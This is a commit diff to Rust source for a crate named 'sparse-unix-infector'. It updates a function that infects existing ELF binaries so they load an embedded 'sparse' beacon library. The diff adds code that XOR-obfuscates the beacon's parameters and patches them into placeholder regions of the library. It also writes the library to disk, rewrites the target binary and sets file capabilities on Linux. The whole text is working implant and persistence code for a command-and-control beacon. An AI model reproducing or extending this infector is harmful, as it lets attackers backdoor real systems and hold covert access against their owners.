feat: got unix-beacon tested on Linux

sparse-unix-infector/src/lib.rs

@@ -4,7 +4,7 @@ use std::{
     slice,
 };
 
-use sparse_actions::payload_types::Parameters;
+use sparse_actions::payload_types::{Parameters, XOR_KEY};
 
 mod elf_types;
 use elf_types::*;
@@ -21,19 +21,41 @@ pub const SPARSE_LIBRARY: &'static [u8] =
 pub fn infect_elf_binary<BP, LP>(
     binary_path: BP,
     target_library_path: LP,
-    sparse_parameters: &Parameters,
+    mut sparse_parameters: Vec<u8>,
 ) -> Result<(), Error>
 where
     BP: AsRef<Path>,
     LP: AsRef<Path>,
 {
-    std::fs::write(&target_library_path, SPARSE_LIBRARY)?;
+    let mut sparse_library = SPARSE_LIBRARY.to_vec();
+
+    for b in sparse_parameters.iter_mut() {
+        *b = *b ^ (XOR_KEY as u8);
+    }
+
+    for i in 0..(sparse_library.len() - sparse_parameters.len()) {
+        if sparse_library[i..(i+256)] == *b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" {
+            sparse_library[i..(i+256)].copy_from_slice(&vec![0; 256]);
+            let tlp = target_library_path
+                .as_ref()
+                .to_str()
+                .expect("invalid path provided for library")
+                .to_owned();
+            sparse_library[i..(i+tlp.len())].copy_from_slice(tlp.as_bytes());
+        }
+        if sparse_library[i..(i + sparse_parameters.len())] == vec![b'B'; sparse_parameters.len()] {
+            sparse_library[i..(i + sparse_parameters.len())].copy_from_slice(&sparse_parameters);
+        }
+    }
+
+    std::fs::write(&target_library_path, sparse_library)?;
 
     let mut binary = std::fs::OpenOptions::new()
         .read(true)
         .write(true)
         .truncate(false)
-        .open(&binary_path)?;
+        .open(&binary_path)
+        .expect("Could not open binary path for infecting");
 
     binary.seek(SeekFrom::End(0))?;
     let end = binary.stream_position()?;
@@ -49,7 +71,7 @@ where
     };
 
     if let ElfIsa::Amd64 = isa {
-        infect_64bit_elf_binary(target_library_path, binary, binary_data, sparse_parameters)?;
+        infect_64bit_elf_binary(target_library_path, binary, binary_data)?;
 
         #[cfg(target_os = "linux")]
         {
@@ -94,8 +116,11 @@ where
                         .expect("could not convert binary path to string"),
                 )
                 .expect("could not convert binary path to string");
+
                 let current_caps = cap_get_file(path.as_ptr());
 
+                println!("Result of getting caps: {}", errno::errno());
+
                 println!(
                     "Result of setting effective caps: {} (errno: {})",
                     cap_set_flag(
@@ -153,7 +178,6 @@ fn infect_64bit_elf_binary<LP, F>(
     library_path: LP,
     mut binary: F,
     mut binary_data: Vec<u8>,
-    sparse_parameters: &Parameters,
 ) -> Result<(), Error>
 where
     LP: AsRef<Path>,
@@ -335,11 +359,5 @@ where
     binary.seek(SeekFrom::Start(0))?;
     binary.write(&binary_data)?;
 
-    let param_data = &sparse_parameters as *const _ as *const u8;
-    let param_slice =
-        unsafe { slice::from_raw_parts(param_data, std::mem::size_of::<Parameters>()) };
-
-    binary.write(param_slice)?;
-
     Ok(())
 }